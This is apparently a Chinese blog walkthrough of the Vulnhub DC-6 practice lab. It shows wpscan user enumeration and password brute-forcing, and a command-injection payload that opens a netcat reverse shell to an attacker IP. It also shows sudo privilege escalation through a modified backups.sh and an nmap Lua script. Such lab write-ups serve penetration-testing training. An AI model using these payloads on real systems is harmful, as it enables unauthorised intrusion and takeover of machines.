zoukankan      html  css  js  c++  java
  • Vulnhub DC6

    简介

    DC-6是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。这不是一个过于困难的挑战,所以应该是伟大的初学者。这个挑战的最终目标是获得根并阅读唯一的旗帜。Linux技能和熟悉Linux命令行是必须的,有一些基本渗透测试工具的经验也是必须的。

    getshell

    官方有给一个提示

    卡里的大字典的一部分,先把这个字典保存下来。

    访问web端页面发现是wordpress,而且提示又有字典,那就用wpscan探测下用户

    wpscan --url "http://wordy" --enumerate u

    爆破账号密码

    wpscan --url "http://wordy/" -U /home/kali/user.txt -P /home/kali/passwords.txt

    成功等到一个用户mark/helpdesk01,但是不急,再爆破一下ssh,ssh爆破无果,乖乖登陆。博客首页一直在提示插件,正好在后台发现了一个插件activity monitor。然后百度这个插件的漏洞

    http://www.oniont.cn/index.php/archives/257.html

    命令执行漏洞

    反弹shell

    127.0.0.1| nc -e /bin/bash 192.168.43.201 1234

    提权

    /home/mark/stuff里面翻到一个账号密码

    接下来去登陆 graham用户,登陆了过后sudo -l

    发现可以不需要jens密码以他的身份使用backups.sh,那直接往这个shell脚本里写入一些恶意代码然后以jens身份执行。

    写入/bin/bash开启一个shell,

    但是需要用jens身份运行,那就相当于开启了jens的shell

    sudo -u jens ./backups.sh

    再次sudo -l,同样发现可以不需要密码通过root身份运行nmap

    nmap提权,看了一下版本7.40,不存在老版本的交互方式提权。但是nmap依然可以脚本,创建一个脚本,用nmap执行即可

    echo 'os.execute("/bin/sh")' > getshell
    sudo nmap --script=getshell
    

    总结

    1. 以某个用户执行脚本的方法 sudo -u username a.sh

    2. nmap执行脚本

      echo 'os.execute("/bin/sh")' > getshell
      sudo nmap --script=getshell
      
  • 相关阅读:
    jarsigner 签名android apk
    弱网络环境下,网络性能优化
    android 中handler的用法分析 (二)
    Mac 上面使用SVN的攻略
    android studio 编译加速
    Https 公钥、私钥、证书
    android sudio 打包资料汇总
    android studio 中查找代码中的硬编码
    ./adb: cannot execute binary file:
    android OOM分析工具LeakCanary
  • 原文地址:https://www.cnblogs.com/tlbjiayou/p/13966157.html
Copyright © 2011-2022 走看看